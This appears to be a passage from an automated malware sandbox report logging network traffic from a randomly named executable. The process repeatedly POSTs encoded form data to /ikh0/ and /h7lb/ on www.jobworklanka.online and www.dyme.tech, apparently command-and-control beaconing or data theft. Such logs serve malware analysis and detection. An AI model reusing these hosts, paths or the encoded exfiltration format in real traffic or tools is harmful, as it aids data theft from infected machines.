                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Sep 25, 2024 11:38:19.231906891 CEST610INHTTP/1.1 404 Not Found
                                              Date: Wed, 25 Sep 2024 09:38:19 GMT
                                              Server: Apache
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 389
                                              X-XSS-Protection: 1; mode=block
                                              Connection: close
                                              Content-Type: text/html; charset=utf-8
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              21192.168.2.75212491.184.0.200804052C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 11:38:24.293692112 CEST847OUTPOST /ikh0/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.jobworklanka.online
                                              Origin: http://www.jobworklanka.online
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 219
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Referer: http://www.jobworklanka.online/ikh0/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Data Raw: 37 6c 70 50 47 78 3d 6f 74 5a 63 79 65 48 58 52 73 55 61 6b 63 74 66 75 64 76 48 48 58 71 6c 57 47 2f 36 79 52 51 68 64 31 72 4c 32 54 43 2f 47 6a 49 6f 75 77 6e 30 42 37 36 65 65 6f 4f 64 61 35 6e 6c 47 55 39 6b 4d 33 69 4b 44 57 6a 61 49 70 48 63 30 44 79 41 4d 51 57 71 68 4c 6d 6d 4f 6f 4e 6f 6f 67 59 72 64 6a 77 74 51 35 6e 34 62 48 4c 70 71 39 77 48 74 69 68 6c 38 72 6c 78 35 52 63 49 4e 31 4f 33 31 68 69 62 31 6c 44 30 64 48 36 49 63 4f 2b 31 49 63 65 78 49 32 52 51 37 5a 57 54 48 32 50 75 42 57 36 76 6b 49 4d 4c 57 77 65 69 2f 4f 51 33 61 2b 36 51 6a 53 63 76 5a 33 72 33 39 78 32 4e 4c 35 37 75 5a 32 64 68 66 4d 38 72 4c 35 6a 4b 56 41 3d 3d
                                              Data Ascii: 7lpPGx=otZcyeHXRsUakctfudvHHXqlWG/6yRQhd1rL2TC/GjIouwn0B76eeoOda5nlGU9kM3iKDWjaIpHc0DyAMQWqhLmmOoNoogYrdjwtQ5n4bHLpq9wHtihl8rlx5RcIN1O31hib1lD0dH6IcO+1IcexI2RQ7ZWTH2PuBW6vkIMLWwei/OQ3a+6QjScvZ3r39x2NL57uZ2dhfM8rL5jKVA==
                                              Sep 25, 2024 11:38:24.903033018 CEST500INHTTP/1.1 404 Not Found
                                              Date: Wed, 25 Sep 2024 09:38:24 GMT
                                              Server: Apache
                                              X-Xss-Protection: 1; mode=block
                                              Referrer-Policy: no-referrer-when-downgrade
                                              X-Content-Type-Options: nosniff
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 196
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              22192.168.2.75212591.184.0.200804052C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 11:38:26.847807884 CEST867OUTPOST /ikh0/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.jobworklanka.online
                                              Origin: http://www.jobworklanka.online
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 239
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Referer: http://www.jobworklanka.online/ikh0/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Data Raw: 37 6c 70 50 47 78 3d 6f 74 5a 63 79 65 48 58 52 73 55 61 6b 39 64 66 74 38 76 48 41 33 71 6b 4b 57 2f 36 39 78 51 6c 64 31 6e 4c 32 52 75 76 47 57 67 6f 76 52 58 30 41 36 36 65 54 49 4f 64 51 5a 6e 67 4c 30 39 37 4d 33 75 43 44 58 50 61 49 70 6a 63 30 44 43 41 4e 6e 69 70 6e 62 6d 6f 56 34 4e 51 6c 41 59 72 64 6a 77 74 51 35 79 6a 62 47 76 70 72 4e 41 48 76 48 4e 6b 32 4c 6c 77 70 78 63 49 66 46 4f 7a 31 68 6a 38 31 6b 65 54 64 42 32 49 63 4d 6d 31 49 4a 72 6e 44 32 51 36 31 35 58 5a 45 6d 72 2b 50 6b 32 72 68 37 41 4b 51 78 75 30 33 59 4e 56 41 63 32 38 39 44 6b 55 64 31 50 42 71 58 72 34 4a 34 2f 32 55 55 70 41 41 37 5a 42 47 72 43 4f 44 33 42 79 54 6d 66 6d 48 4d 57 49 79 34 39 65 74 77 65 4f 46 70 45 3d
                                              Data Ascii: 7lpPGx=otZcyeHXRsUak9dft8vHA3qkKW/69xQld1nL2RuvGWgovRX0A66eTIOdQZngL097M3uCDXPaIpjc0DCANnipnbmoV4NQlAYrdjwtQ5yjbGvprNAHvHNk2LlwpxcIfFOz1hj81keTdB2IcMm1IJrnD2Q615XZEmr+Pk2rh7AKQxu03YNVAc289DkUd1PBqXr4J4/2UUpAA7ZBGrCOD3ByTmfmHMWIy49etweOFpE=
                                              Sep 25, 2024 11:38:27.458257914 CEST500INHTTP/1.1 404 Not Found
                                              Date: Wed, 25 Sep 2024 09:38:27 GMT
                                              Server: Apache
                                              X-Xss-Protection: 1; mode=block
                                              Referrer-Policy: no-referrer-when-downgrade
                                              X-Content-Type-Options: nosniff
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 196
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              23192.168.2.75212691.184.0.200804052C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 11:38:29.395831108 CEST1880OUTPOST /ikh0/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.jobworklanka.online
                                              Origin: http://www.jobworklanka.online
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 1251
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Referer: http://www.jobworklanka.online/ikh0/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Data Raw: 37 6c 70 50 47 78 3d 6f 74 5a 63 79 65 48 58 52 73 55 61 6b 39 64 66 74 38 76 48 41 33 71 6b 4b 57 2f 36 39 78 51 6c 64 31 6e 4c 32 52 75 76 47 57 34 6f 76 6a 66 30 41 5a 53 65 63 6f 4f 64 4c 5a 6e 68 4c 30 39 79 4d 7a 43 47 44 58 79 74 49 76 6e 63 79 67 36 41 45 7a 2b 70 70 62 6d 6f 63 59 4e 72 6f 67 59 2b 64 6a 41 70 51 35 69 6a 62 47 76 70 72 4f 59 48 6d 79 68 6b 77 4c 6c 78 35 52 63 45 4e 31 4f 58 31 6c 48 47 31 6b 61 70 63 78 57 49 62 73 32 31 45 62 44 6e 42 57 52 63 32 35 57 4d 45 6d 57 35 50 6b 36 64 68 36 45 67 51 79 2b 30 30 75 34 7a 46 6f 71 56 71 31 77 53 63 55 58 66 67 45 36 4c 4e 49 4f 4c 52 57 42 77 49 38 5a 58 66 37 79 62 47 53 4d 2b 4d 46 7a 4c 48 75 75 78 32 2f 34 32 35 69 79 59 52 66 34 41 79 7a 43 38 61 4d 4b 4e 68 31 35 6a 6d 5a 54 56 76 6b 32 48 2b 56 58 38 79 65 59 78 36 49 6a 36 61 79 4b 72 78 55 30 70 70 2f 67 59 42 47 38 36 31 6c 62 49 6f 46 35 2b 53 36 4e 63 33 68 67 5a 43 6e 4f 58 64 39 63 46 54 4e 6e 44 67 70 32 6f 74 47 53 6a 47 4b 39 69 33 54 32 6c 47 39 63 71 78 4b 58 [TRUNCATED]
                                              Data Ascii: 7lpPGx=otZcyeHXRsUak9dft8vHA3qkKW/69xQld1nL2RuvGW4ovjf0AZSecoOdLZnhL09yMzCGDXytIvncyg6AEz+ppbmocYNrogY+djApQ5ijbGvprOYHmyhkwLlx5RcEN1OX1lHG1kapcxWIbs21EbDnBWRc25WMEmW5Pk6dh6EgQy+00u4zFoqVq1wScUXfgE6LNIOLRWBwI8ZXf7ybGSM+MFzLHuux2/425iyYRf4AyzC8aMKNh15jmZTVvk2H+VX8yeYx6Ij6ayKrxU0pp/gYBG861lbIoF5+S6Nc3hgZCnOXd9cFTNnDgp2otGSjGK9i3T2lG9cqxKXzvCuhyrMdmvphYxSFy4Kh3dHOT4jxH/fs9nKo0qilH97dwfVd1ZsaCd+/p+XveUde/hCZBm/IdUtB08OFUTAI4lquo0oot8IoJ1M23GH0S8rSDweVPovR9QYadj86sVwYJ3Gw4S/urFOSvecZZnTIUAfocJZY8tRqbU7CmkIrhNHOE+cxSMfsqj7z+dFjGex7ZgmJhoPF4qPjGjbeGSECkpYmv1a/TR1i1B3ap80WEv4UpcCghQbbFgZ0oIg+gtH1N/X2K44Kw3v8sHyFcGHPWBZdrq0vuQPykimpPh1ZDLWOOktirAffolVKaQhbbBpxechtTGVzkvuOaZvK7uuG8fiwMuC7VAZ0RraqlTAqNjkxFbe5PMLjpOMUsGgqWzTqfq1nN2NlMVpYCWNEKpK+S7ncN0SSrZatVUkyYPgL0SzrbEysPnDCUlZ+pV47VoUovHxS45q8xiBkOJVaDSy1x8khiFKv2lsnJwKv/VkNaphT4khII+SRJ5l6Q1S+Qc+IsrV3i/IMdwz4DlBtutJ4T25JzsP9zhE/HPAoIJehj32y8Fg0jgPid6CDON3+8daeECOZ3Ovw1KzB9PKR91OgU781parij5Zkekejf5foknwOJz5GjCFyit1CjaN+0ZUQkMDbnYGp1JvQ5ir5d3ZHuXRPrhepCb/W1 [TRUNCATED]
                                              Sep 25, 2024 11:38:30.000355005 CEST500INHTTP/1.1 404 Not Found
                                              Date: Wed, 25 Sep 2024 09:38:29 GMT
                                              Server: Apache
                                              X-Xss-Protection: 1; mode=block
                                              Referrer-Policy: no-referrer-when-downgrade
                                              X-Content-Type-Options: nosniff
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 196
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              24192.168.2.75212791.184.0.200804052C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 11:38:31.940078974 CEST577OUTGET /ikh0/?QF4tL=lBP8AZrpnb&7lpPGx=lvx8xqKuEeZXr5IXmtDcOSOuXgPzygssZETVjxqXK0Zv2i3/Db6zT6O/acvvHmVSaGyiGmLaE43R+XLSCAO1uJuIaoF4jHIQUSYKPYHcUgvqmMBPmFsZ+bgj1yNrVQypjRbF20O0Zy39 HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.jobworklanka.online
                                              Connection: close
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Sep 25, 2024 11:38:32.550679922 CEST500INHTTP/1.1 404 Not Found
                                              Date: Wed, 25 Sep 2024 09:38:32 GMT
                                              Server: Apache
                                              X-Xss-Protection: 1; mode=block
                                              Referrer-Policy: no-referrer-when-downgrade
                                              X-Content-Type-Options: nosniff
                                              X-Frame-Options: SAMEORIGIN
                                              Content-Length: 196
                                              Connection: close
                                              Content-Type: text/html; charset=iso-8859-1
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              25192.168.2.75212813.248.169.48804052C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 11:38:37.915832043 CEST817OUTPOST /h7lb/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.dyme.tech
                                              Origin: http://www.dyme.tech
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 219
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Referer: http://www.dyme.tech/h7lb/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Data Raw: 37 6c 70 50 47 78 3d 63 5a 6e 6e 5a 35 6c 77 39 6d 56 6f 73 4a 53 4a 62 2f 6b 54 33 48 37 47 37 55 79 74 4a 6e 75 7a 36 55 46 63 34 37 46 54 4d 6f 44 4a 6b 73 59 58 73 48 55 58 49 77 39 50 76 56 31 67 78 38 56 52 5a 53 77 71 6d 7a 76 78 30 45 47 7a 2b 49 51 52 62 73 7a 31 61 4f 77 38 69 4b 6e 4c 74 4e 6f 61 73 77 34 4a 38 59 6d 42 39 4f 34 66 56 49 42 43 2f 30 36 6b 6f 38 2b 69 44 57 46 55 4e 44 54 49 76 4a 64 48 75 39 68 41 47 6e 56 55 6a 54 68 69 57 64 46 46 39 32 50 64 41 79 43 46 6a 63 30 4b 74 74 34 43 38 7a 69 56 42 75 41 64 4c 59 53 49 6b 50 31 55 33 49 30 4a 30 77 73 68 6e 46 49 49 70 68 76 51 44 75 63 6a 2f 4b 7a 58 37 6a 6b 58 58 51 3d 3d
                                              Data Ascii: 7lpPGx=cZnnZ5lw9mVosJSJb/kT3H7G7UytJnuz6UFc47FTMoDJksYXsHUXIw9PvV1gx8VRZSwqmzvx0EGz+IQRbsz1aOw8iKnLtNoasw4J8YmB9O4fVIBC/06ko8+iDWFUNDTIvJdHu9hAGnVUjThiWdFF92PdAyCFjc0Ktt4C8ziVBuAdLYSIkP1U3I0J0wshnFIIphvQDucj/KzX7jkXXQ==


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              26192.168.2.75212913.248.169.48804052C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 11:38:40.515198946 CEST837OUTPOST /h7lb/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.dyme.tech
                                              Origin: http://www.dyme.tech
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 239
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Referer: http://www.dyme.tech/h7lb/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Data Raw: 37 6c 70 50 47 78 3d 63 5a 6e 6e 5a 35 6c 77 39 6d 56 6f 74 70 43 4a 5a 63 63 54 79 6e 37 46 2b 55 79 74 53 33 75 2f 36 55 4a 63 34 2f 31 44 4d 61 6e 4a 6c 4f 51 58 76 47 55 58 4c 77 39 50 36 6c 31 6c 31 38 56 47 5a 53 30 55 6d 33 72 78 30 45 43 7a 2b 4b 49 52 62 37 6e 36 62 65 77 69 70 71 6e 4e 6a 74 6f 61 73 77 34 4a 38 63 47 72 39 4f 67 66 56 34 78 43 2b 57 65 6c 6c 63 2b 68 54 47 46 55 47 6a 54 4d 76 4a 64 31 75 34 45 6c 47 6c 74 55 6a 53 78 69 48 76 74 45 32 32 50 62 4f 53 43 52 67 4f 73 61 31 73 63 45 31 51 2b 37 4d 39 51 71 4b 75 50 71 2b 74 35 34 70 5a 4d 79 77 79 49 58 77 6a 56 39 72 67 72 49 4f 4d 6f 43 67 39 57 39 32 78 46 54 42 6b 4d 6d 46 64 58 64 6b 45 4d 35 68 6e 43 69 75 51 47 54 57 6c 51 3d
                                              Data Ascii: 7lpPGx=cZnnZ5lw9mVotpCJZccTyn7F+UytS3u/6UJc4/1DManJlOQXvGUXLw9P6l1l18VGZS0Um3rx0ECz+KIRb7n6bewipqnNjtoasw4J8cGr9OgfV4xC+Wellc+hTGFUGjTMvJd1u4ElGltUjSxiHvtE22PbOSCRgOsa1scE1Q+7M9QqKuPq+t54pZMywyIXwjV9rgrIOMoCg9W92xFTBkMmFdXdkEM5hnCiuQGTWlQ=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              27192.168.2.75213013.248.169.48804052C:\Program Files (x86)\bdEYDiKsLZpuwzuftJnHRBOdwFYonSsgHAXXVkucTesQxMMKTsJyhORXorhIntdV\eMNaOgRkIZi.exe
                                              TimestampBytes transferredDirectionData
                                              Sep 25, 2024 11:38:43.068074942 CEST1850OUTPOST /h7lb/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate
                                              Accept-Language: en-US,en;q=0.9
                                              Host: www.dyme.tech
                                              Origin: http://www.dyme.tech
                                              Content-Type: application/x-www-form-urlencoded
                                              Content-Length: 1251
                                              Connection: close
                                              Cache-Control: max-age=0
                                              Referer: http://www.dyme.tech/h7lb/
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.5; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
                                              Data Raw: 37 6c 70 50 47 78 3d 63 5a 6e 6e 5a 35 6c 77 39 6d 56 6f 74 70 43 4a 5a 63 63 54 79 6e 37 46 2b 55 79 74 53 33 75 2f 36 55 4a 63 34 2f 31 44 4d 61 76 4a 6b 39 49 58 73 6c 38 58 4b 77 39 50 6d 31 31 6b 31 38 56 2b 5a 53 4e 54 6d 33 6e 48 30 47 71 7a 38 70 41 52 4c 61 6e 36 52 65 77 69 6d 4b 6e 49 74 4e 6f 50 73 77 4a 43 38 59 69 72 39 4f 67 66 56 2b 64 43 35 45 36 6c 6e 63 2b 69 44 57 46 49 4e 44 54 6b 76 49 31 66 75 34 42 51 47 52 5a 55 6b 79 42 69 46 36 78 45 71 6d 50 5a 4e 53 44 57 67 4f 52 64 31 73 42 37 31 54 69 52 4d 2f 41 71 4c 72 53 73 71 75 52 66 37 2f 6b 74 36 69 51 67 37 53 70 78 79 44 66 54 4f 73 34 6b 73 64 32 66 39 48 6c 61 4d 41 6c 59 52 2f 48 51 71 51 70 76 6b 77 65 71 38 42 6d 62 55 69 37 35 74 48 59 78 66 2b 43 2b 6e 77 64 4c 50 58 33 7a 33 32 73 73 58 6e 36 71 30 44 41 59 6e 38 59 57 65 59 72 7a 62 32 68 68 4c 4f 55 36 79 4f 45 6d 2b 64 49 58 72 45 49 5a 35 39 6a 70 61 46 65 49 6d 38 66 6c 48 54 78 68 44 6f 59 52 57 4a 30 78 42 47 6b 44 37 49 52 35 53 76 63 45 37 43 74 56 67 70 32 [TRUNCATED]
                                              Data Ascii: 7lpPGx=cZnnZ5lw9mVotpCJZccTyn7F+UytS3u/6UJc4/1DMavJk9IXsl8XKw9Pm11k18V+ZSNTm3nH0Gqz8pARLan6RewimKnItNoPswJC8Yir9OgfV+dC5E6lnc+iDWFINDTkvI1fu4BQGRZUkyBiF6xEqmPZNSDWgORd1sB71TiRM/AqLrSsquRf7/kt6iQg7SpxyDfTOs4ksd2f9HlaMAlYR/HQqQpvkweq8BmbUi75tHYxf+C+nwdLPX3z32ssXn6q0DAYn8YWeYrzb2hhLOU6yOEm+dIXrEIZ59jpaFeIm8flHTxhDoYRWJ0xBGkD7IR5SvcE7CtVgp2K99SCM65sdBt7AlsktZeF79krTExzicIb+lgz0nILLi84nKkxRK8pO+3vtgMiC4p2ppuRUiXYSDjl0+hzPGCcty5wix2W1vqqC80hPb2FawVR3+zuKB7TdJ/bqZMOEew2MFomKjadc7mb0svIFhVgmm9vi2ELWEnY1wHpsD+O31YvFDFDIM854zzCZV4dN5psnjrSD1TExrarUjbp0T5rYzfb+G/m+YJVLZrgyZMwHz2AASGWfEcJTh1CPMBn+VVHVzHsde7MWFFTlqrDudR6+HrXUgSVOAJaVBxiUMRCgeQPXrc2u0cxLtlJW5gBw70WLXDFF4Rs2+6NmB2lo08DJpNSi3BGTeuZPUOmyBmjiJnaCjyohdkykxZDybrHOuHw7xcnf3cshiF+Iyj+jkoxDLM852yHfR5sRbiJL8Ig2mbJs4wTZWYzBiZL9chwm3LjSS7iezQs0cIep8ydX7RN6ayNPeJ3i8HoydTViOwjrN3GkjHlIXFlXS6hZolMPaIgEdp4Q9NfFBY6UE3q95SBennDeumeKIzOxkz+o2GgbzDDSVbBFjI9QwXWGuRJ4PIS3wHdtQKpk9dExmkYUsao3pE/nF8O/eduqCzdXmPxbZCfbYrHL3ukWmafyrm/pFnXyyCpT2l9PzVhPq5z08687aSiIbB40Zy8u [TRUNCATED]


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
